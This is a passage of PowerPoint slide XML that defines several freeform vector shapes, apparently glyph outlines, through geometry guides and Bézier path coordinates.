                    <a:pt x="139" y="192"/>
                    <a:pt x="102"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5" name="Freeform 156">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB2B614B-315D-40E5-966D-EF579C9677A1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId57"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4535489" y="3101975"/>
              <a:ext cx="87313" cy="96838"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 205 w 205"/>
                <a:gd name="T1" fmla="*/ 112 h 222"/>
                <a:gd name="T2" fmla="*/ 103 w 205"/>
                <a:gd name="T3" fmla="*/ 0 h 222"/>
                <a:gd name="T4" fmla="*/ 0 w 205"/>
                <a:gd name="T5" fmla="*/ 112 h 222"/>
                <a:gd name="T6" fmla="*/ 103 w 205"/>
                <a:gd name="T7" fmla="*/ 222 h 222"/>
                <a:gd name="T8" fmla="*/ 205 w 205"/>
                <a:gd name="T9" fmla="*/ 112 h 222"/>
                <a:gd name="T10" fmla="*/ 103 w 205"/>
                <a:gd name="T11" fmla="*/ 192 h 222"/>
                <a:gd name="T12" fmla="*/ 35 w 205"/>
                <a:gd name="T13" fmla="*/ 108 h 222"/>
                <a:gd name="T14" fmla="*/ 103 w 205"/>
                <a:gd name="T15" fmla="*/ 30 h 222"/>
                <a:gd name="T16" fmla="*/ 170 w 205"/>
                <a:gd name="T17" fmla="*/ 108 h 222"/>
                <a:gd name="T18" fmla="*/ 103 w 205"/>
                <a:gd name="T19" fmla="*/ 1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22">
                  <a:moveTo>
                    <a:pt x="205" y="112"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="49"/>
                    <a:pt x="158" y="0"/>
                    <a:pt x="103" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="0"/>
                    <a:pt x="0" y="49"/>
                    <a:pt x="0" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="175"/>
                    <a:pt x="48" y="222"/>
                    <a:pt x="103" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="222"/>
                    <a:pt x="205" y="174"/>
                    <a:pt x="205" y="112"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="103" y="192"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="192"/>
                    <a:pt x="35" y="154"/>
                    <a:pt x="35" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="63"/>
                    <a:pt x="67" y="30"/>
                    <a:pt x="103" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="30"/>
                    <a:pt x="170" y="63"/>
                    <a:pt x="170" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="154"/>
                    <a:pt x="139" y="192"/>
                    <a:pt x="103"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6" name="Freeform 157">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E1A015D-1AFD-4B84-9E61-4D447C1DC0CB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId58"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4640264" y="3078163"/>
              <a:ext cx="88900" cy="120650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 98 w 211"/>
                <a:gd name="T1" fmla="*/ 92 h 279"/>
                <a:gd name="T2" fmla="*/ 180 w 211"/>
                <a:gd name="T3" fmla="*/ 92 h 279"/>
                <a:gd name="T4" fmla="*/ 200 w 211"/>
                <a:gd name="T5" fmla="*/ 77 h 279"/>
                <a:gd name="T6" fmla="*/ 180 w 211"/>
                <a:gd name="T7" fmla="*/ 61 h 279"/>
                <a:gd name="T8" fmla="*/ 98 w 211"/>
                <a:gd name="T9" fmla="*/ 61 h 279"/>
                <a:gd name="T10" fmla="*/ 98 w 211"/>
                <a:gd name="T11" fmla="*/ 20 h 279"/>
                <a:gd name="T12" fmla="*/ 81 w 211"/>
                <a:gd name="T13" fmla="*/ 0 h 279"/>
                <a:gd name="T14" fmla="*/ 64 w 211"/>
                <a:gd name="T15" fmla="*/ 20 h 279"/>
                <a:gd name="T16" fmla="*/ 64 w 211"/>
                <a:gd name="T17" fmla="*/ 61 h 279"/>
                <a:gd name="T18" fmla="*/ 20 w 211"/>
                <a:gd name="T19" fmla="*/ 61 h 279"/>
                <a:gd name="T20" fmla="*/ 0 w 211"/>
                <a:gd name="T21" fmla="*/ 77 h 279"/>
                <a:gd name="T22" fmla="*/ 20 w 211"/>
                <a:gd name="T23" fmla="*/ 92 h 279"/>
                <a:gd name="T24" fmla="*/ 64 w 211"/>
                <a:gd name="T25" fmla="*/ 92 h 279"/>
                <a:gd name="T26" fmla="*/ 64 w 211"/>
                <a:gd name="T27" fmla="*/ 213 h 279"/>
                <a:gd name="T28" fmla="*/ 134 w 211"/>
                <a:gd name="T29" fmla="*/ 279 h 279"/>
                <a:gd name="T30" fmla="*/ 211 w 211"/>
                <a:gd name="T31" fmla="*/ 213 h 279"/>
                <a:gd name="T32" fmla="*/ 194 w 211"/>
                <a:gd name="T33" fmla="*/ 194 h 279"/>
                <a:gd name="T34" fmla="*/ 177 w 211"/>
                <a:gd name="T35" fmla="*/ 213 h 279"/>
                <a:gd name="T36" fmla="*/ 137 w 211"/>
                <a:gd name="T37" fmla="*/ 249 h 279"/>
                <a:gd name="T38" fmla="*/ 98 w 211"/>
                <a:gd name="T39" fmla="*/ 210 h 279"/>
                <a:gd name="T40" fmla="*/ 98 w 211"/>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 h="279">
                  <a:moveTo>
                    <a:pt x="98" y="92"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="180" y="92"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="92"/>
                    <a:pt x="200" y="92"/>
                    <a:pt x="200" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="61"/>
                    <a:pt x="188" y="61"/>
                    <a:pt x="180" y="61"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="98" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="11"/>
                    <a:pt x="98" y="0"/>
                    <a:pt x="81" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="0"/>
                    <a:pt x="64" y="10"/>
                    <a:pt x="64" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="61"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="61"/>
                    <a:pt x="0" y="61"/>
                    <a:pt x="0" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="92"/>
                    <a:pt x="12" y="92"/>
                    <a:pt x="20" y="92"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="92"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64" y="213"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="261"/>
                    <a:pt x="98" y="279"/>
                    <a:pt x="134" y="279"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="279"/>
                    <a:pt x="211" y="258"/>
                    <a:pt x="211" y="213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="204"/>
                    <a:pt x="211" y="194"/>
                    <a:pt x="194" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="194"/>
                    <a:pt x="177" y="204"/>
                    <a:pt x="177" y="213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="244"/>
                    <a:pt x="148" y="249"/>
                    <a:pt x="137" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="249"/>
                    <a:pt x="98" y="223"/>
                    <a:pt x="98" y="210"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="98"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7" name="Freeform 158">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFD2AD40-4761-4452-8852-C030C64099B8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId59"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4868864" y="3046413"/>
              <a:ext cx="85725" cy="169863"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 199 w 203"/>
                <a:gd name="T1" fmla="*/ 30 h 388"/>
                <a:gd name="T2" fmla="*/ 203 w 203"/>
                <a:gd name="T3" fmla="*/ 18 h 388"/>
                <a:gd name="T4" fmla="*/ 186 w 203"/>
                <a:gd name="T5" fmla="*/ 0 h 388"/>
                <a:gd name="T6" fmla="*/ 168 w 203"/>
                <a:gd name="T7" fmla="*/ 14 h 388"/>
                <a:gd name="T8" fmla="*/ 4 w 203"/>
                <a:gd name="T9" fmla="*/ 358 h 388"/>
                <a:gd name="T10" fmla="*/ 0 w 203"/>
                <a:gd name="T11" fmla="*/ 370 h 388"/>
                <a:gd name="T12" fmla="*/ 17 w 203"/>
                <a:gd name="T13" fmla="*/ 388 h 388"/>
                <a:gd name="T14" fmla="*/ 34 w 203"/>
                <a:gd name="T15" fmla="*/ 374 h 388"/>
                <a:gd name="T16" fmla="*/ 199 w 203"/>
                <a:gd name="T17" fmla="*/ 3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388">
                  <a:moveTo>
                    <a:pt x="199" y="30"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="22"/>
                    <a:pt x="203" y="22"/>
                    <a:pt x="203" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="9"/>
                    <a:pt x="196" y="0"/>
                    <a:pt x="186" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="0"/>
                    <a:pt x="171" y="8"/>
                    <a:pt x="168" y="14"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="4" y="358"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="366"/>
                    <a:pt x="0" y="366"/>
                    <a:pt x="0" y="370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="379"/>
                    <a:pt x="7" y="388"/>
                    <a:pt x="17" y="388"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="388"/>
                    <a:pt x="31" y="380"/>
                    <a:pt x="34" y="374"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="199"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8" name="Freeform 159">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{538AF0E7-5269-45D5-AE45-EBB4C4B6EB89}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId60"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4972051" y="3103563"/>
              <a:ext cx="100013" cy="95250"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 203 w 237"/>
                <a:gd name="T1" fmla="*/ 31 h 217"/>
                <a:gd name="T2" fmla="*/ 218 w 237"/>
                <a:gd name="T3" fmla="*/ 31 h 217"/>
                <a:gd name="T4" fmla="*/ 237 w 237"/>
                <a:gd name="T5" fmla="*/ 16 h 217"/>
                <a:gd name="T6" fmla="*/ 218 w 237"/>
                <a:gd name="T7" fmla="*/ 0 h 217"/>
                <a:gd name="T8" fmla="*/ 159 w 237"/>
                <a:gd name="T9" fmla="*/ 0 h 217"/>
                <a:gd name="T10" fmla="*/ 139 w 237"/>
                <a:gd name="T11" fmla="*/ 15 h 217"/>
                <a:gd name="T12" fmla="*/ 159 w 237"/>
                <a:gd name="T13" fmla="*/ 31 h 217"/>
                <a:gd name="T14" fmla="*/ 173 w 237"/>
                <a:gd name="T15" fmla="*/ 31 h 217"/>
                <a:gd name="T16" fmla="*/ 119 w 237"/>
                <a:gd name="T17" fmla="*/ 191 h 217"/>
                <a:gd name="T18" fmla="*/ 64 w 237"/>
                <a:gd name="T19" fmla="*/ 31 h 217"/>
                <a:gd name="T20" fmla="*/ 78 w 237"/>
                <a:gd name="T21" fmla="*/ 31 h 217"/>
                <a:gd name="T22" fmla="*/ 98 w 237"/>
                <a:gd name="T23" fmla="*/ 16 h 217"/>
                <a:gd name="T24" fmla="*/ 78 w 237"/>
                <a:gd name="T25" fmla="*/ 0 h 217"/>
                <a:gd name="T26" fmla="*/ 20 w 237"/>
                <a:gd name="T27" fmla="*/ 0 h 217"/>
                <a:gd name="T28" fmla="*/ 0 w 237"/>
                <a:gd name="T29" fmla="*/ 16 h 217"/>
                <a:gd name="T30" fmla="*/ 20 w 237"/>
                <a:gd name="T31" fmla="*/ 31 h 217"/>
                <a:gd name="T32" fmla="*/ 35 w 237"/>
                <a:gd name="T33" fmla="*/ 31 h 217"/>
                <a:gd name="T34" fmla="*/ 92 w 237"/>
                <a:gd name="T35" fmla="*/ 200 h 217"/>
                <a:gd name="T36" fmla="*/ 119 w 237"/>
                <a:gd name="T37" fmla="*/ 217 h 217"/>
                <a:gd name="T38" fmla="*/ 145 w 237"/>
                <a:gd name="T39" fmla="*/ 201 h 217"/>
                <a:gd name="T40" fmla="*/ 203 w 237"/>
                <a:gd name="T41" fmla="*/ 3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7" h="217">
                  <a:moveTo>
                    <a:pt x="203" y="31"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="218" y="31"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="225" y="31"/>
                    <a:pt x="237" y="31"/>
                    <a:pt x="237" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="0"/>
                    <a:pt x="226" y="0"/>
                    <a:pt x="218" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="159" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="152" y="0"/>
                    <a:pt x="139" y="0"/>
                    <a:pt x="139" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="31"/>
                    <a:pt x="151" y="31"/>
                    <a:pt x="159" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="173" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119" y="191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78" y="31"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="31"/>
                    <a:pt x="98" y="31"/>
                    <a:pt x="98" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="0"/>
                    <a:pt x="86" y="0"/>
                    <a:pt x="78" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="31"/>
                    <a:pt x="13" y="31"/>
                    <a:pt x="20" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="35" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="200"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="217"/>
                    <a:pt x="108" y="217"/>
                    <a:pt x="119" y="217"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="217"/>
                    <a:pt x="140" y="217"/>
                    <a:pt x="145" y="201"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="203" y="3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9" name="Freeform 160">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30A61EA8-C918-49C3-B458-6F6712D84DBC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId61"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5089526" y="3101975"/>
              <a:ext cx="98425" cy="96838"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 155 w 234"/>
                <a:gd name="T1" fmla="*/ 203 h 222"/>
                <a:gd name="T2" fmla="*/ 209 w 234"/>
                <a:gd name="T3" fmla="*/ 219 h 222"/>
                <a:gd name="T4" fmla="*/ 234 w 234"/>
                <a:gd name="T5" fmla="*/ 204 h 222"/>
                <a:gd name="T6" fmla="*/ 214 w 234"/>
                <a:gd name="T7" fmla="*/ 189 h 222"/>
                <a:gd name="T8" fmla="*/ 184 w 234"/>
                <a:gd name="T9" fmla="*/ 185 h 222"/>
                <a:gd name="T10" fmla="*/ 184 w 234"/>
                <a:gd name="T11" fmla="*/ 77 h 222"/>
                <a:gd name="T12" fmla="*/ 85 w 234"/>
                <a:gd name="T13" fmla="*/ 0 h 222"/>
                <a:gd name="T14" fmla="*/ 13 w 234"/>
                <a:gd name="T15" fmla="*/ 36 h 222"/>
                <a:gd name="T16" fmla="*/ 36 w 234"/>
                <a:gd name="T17" fmla="*/ 59 h 222"/>
                <a:gd name="T18" fmla="*/ 57 w 234"/>
                <a:gd name="T19" fmla="*/ 36 h 222"/>
                <a:gd name="T20" fmla="*/ 68 w 234"/>
                <a:gd name="T21" fmla="*/ 31 h 222"/>
                <a:gd name="T22" fmla="*/ 86 w 234"/>
                <a:gd name="T23" fmla="*/ 30 h 222"/>
                <a:gd name="T24" fmla="*/ 150 w 234"/>
                <a:gd name="T25" fmla="*/ 81 h 222"/>
                <a:gd name="T26" fmla="*/ 0 w 234"/>
                <a:gd name="T27" fmla="*/ 155 h 222"/>
                <a:gd name="T28" fmla="*/ 82 w 234"/>
                <a:gd name="T29" fmla="*/ 222 h 222"/>
                <a:gd name="T30" fmla="*/ 155 w 234"/>
                <a:gd name="T31" fmla="*/ 203 h 222"/>
                <a:gd name="T32" fmla="*/ 150 w 234"/>
                <a:gd name="T33" fmla="*/ 111 h 222"/>
                <a:gd name="T34" fmla="*/ 150 w 234"/>
                <a:gd name="T35" fmla="*/ 152 h 222"/>
                <a:gd name="T36" fmla="*/ 130 w 234"/>
                <a:gd name="T37" fmla="*/ 183 h 222"/>
                <a:gd name="T38" fmla="*/ 86 w 234"/>
                <a:gd name="T39" fmla="*/ 192 h 222"/>
                <a:gd name="T40" fmla="*/ 35 w 234"/>
                <a:gd name="T41" fmla="*/ 155 h 222"/>
                <a:gd name="T42" fmla="*/ 150 w 234"/>
                <a:gd name="T43" fmla="*/ 11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4" h="222">
                  <a:moveTo>
                    <a:pt x="155" y="203"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="219"/>
                    <a:pt x="190" y="219"/>
                    <a:pt x="209" y="219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="223" y="219"/>
                    <a:pt x="234" y="219"/>
                    <a:pt x="234" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="234" y="189"/>
                    <a:pt x="222" y="189"/>
                    <a:pt x="214" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="189"/>
                    <a:pt x="188" y="186"/>
                    <a:pt x="184" y="185"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="77"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="42"/>
                    <a:pt x="157" y="0"/>
                    <a:pt x="85" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="0"/>
                    <a:pt x="13" y="0"/>
                    <a:pt x="13" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="51"/>
                    <a:pt x="24" y="59"/>
                    <a:pt x="36" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="59"/>
                    <a:pt x="57" y="55"/>
                    <a:pt x="57" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="32"/>
                    <a:pt x="58" y="32"/>
                    <a:pt x="68" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="30"/>
                    <a:pt x="81" y="30"/>
                    <a:pt x="86" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="30"/>
                    <a:pt x="150" y="46"/>
                    <a:pt x="150" y="81"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="83"/>
                    <a:pt x="0" y="108"/>
                    <a:pt x="0" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="190"/>
                    <a:pt x="32" y="222"/>
                    <a:pt x="82" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="222"/>
                    <a:pt x="132" y="219"/>
                    <a:pt x="155" y="203"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="150" y="111"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="150" y="152"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="164"/>
                    <a:pt x="150" y="174"/>
                    <a:pt x="130" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="192"/>
                    <a:pt x="90" y="192"/>
                    <a:pt x="86" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="192"/>
                    <a:pt x="35" y="175"/>
                    <a:pt x="35" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="131"/>
                    <a:pt x="77" y="113"/>
                    <a:pt x="150" y="11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0" name="Freeform 161">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91D4C3BB-20BC-4468-BA7C-65B02C9D6746}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId62"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5195889" y="3103563"/>
              <a:ext cx="95250" cy="95250"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 95 w 227"/>
                <a:gd name="T1" fmla="*/ 126 h 218"/>
                <a:gd name="T2" fmla="*/ 185 w 227"/>
                <a:gd name="T3" fmla="*/ 31 h 218"/>
                <a:gd name="T4" fmla="*/ 206 w 227"/>
                <a:gd name="T5" fmla="*/ 53 h 218"/>
                <a:gd name="T6" fmla="*/ 227 w 227"/>
                <a:gd name="T7" fmla="*/ 31 h 218"/>
                <a:gd name="T8" fmla="*/ 180 w 227"/>
                <a:gd name="T9" fmla="*/ 0 h 218"/>
                <a:gd name="T10" fmla="*/ 95 w 227"/>
                <a:gd name="T11" fmla="*/ 41 h 218"/>
                <a:gd name="T12" fmla="*/ 95 w 227"/>
                <a:gd name="T13" fmla="*/ 24 h 218"/>
                <a:gd name="T14" fmla="*/ 75 w 227"/>
                <a:gd name="T15" fmla="*/ 3 h 218"/>
                <a:gd name="T16" fmla="*/ 20 w 227"/>
                <a:gd name="T17" fmla="*/ 3 h 218"/>
                <a:gd name="T18" fmla="*/ 0 w 227"/>
                <a:gd name="T19" fmla="*/ 18 h 218"/>
                <a:gd name="T20" fmla="*/ 20 w 227"/>
                <a:gd name="T21" fmla="*/ 34 h 218"/>
                <a:gd name="T22" fmla="*/ 61 w 227"/>
                <a:gd name="T23" fmla="*/ 34 h 218"/>
                <a:gd name="T24" fmla="*/ 61 w 227"/>
                <a:gd name="T25" fmla="*/ 188 h 218"/>
                <a:gd name="T26" fmla="*/ 20 w 227"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 0 w 227"/>
                <a:gd name="T29" fmla="*/ 203 h 218"/>
                <a:gd name="T30" fmla="*/ 20 w 227"/>
                <a:gd name="T31" fmla="*/ 218 h 218"/>
                <a:gd name="T32" fmla="*/ 150 w 227"/>
                <a:gd name="T33" fmla="*/ 218 h 218"/>
                <a:gd name="T34" fmla="*/ 171 w 227"/>
                <a:gd name="T35" fmla="*/ 203 h 218"/>
                <a:gd name="T36" fmla="*/ 150 w 227"/>
                <a:gd name="T37" fmla="*/ 188 h 218"/>
                <a:gd name="T38" fmla="*/ 95 w 227"/>
                <a:gd name="T39" fmla="*/ 188 h 218"/>
                <a:gd name="T40" fmla="*/ 95 w 227"/>
                <a:gd name="T41" fmla="*/ 12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7" h="218">
                  <a:moveTo>
                    <a:pt x="95" y="126"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="79"/>
                    <a:pt x="124" y="31"/>
                    <a:pt x="185" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="185" y="43"/>
                    <a:pt x="194" y="53"/>
                    <a:pt x="206" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="217" y="53"/>
                    <a:pt x="227" y="45"/>
                    <a:pt x="227" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="227" y="21"/>
                    <a:pt x="221" y="0"/>
                    <a:pt x="180" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="0"/>
                    <a:pt x="122" y="9"/>
                    <a:pt x="95" y="41"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="95" y="24"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="8"/>
                    <a:pt x="92" y="3"/>
                    <a:pt x="75" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="34"/>
                    <a:pt x="12" y="34"/>
                    <a:pt x="20" y="34"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="61" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="188"/>
                    <a:pt x="0" y="188"/>
                    <a:pt x="0" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="218"/>
                    <a:pt x="12" y="218"/>
                    <a:pt x="20" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="150" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="218"/>
                    <a:pt x="171" y="218"/>
                    <a:pt x="171" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="188"/>
                    <a:pt x="158" y="188"/>
                    <a:pt x="150" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="95" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95" y="12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1" name="Freeform 162">
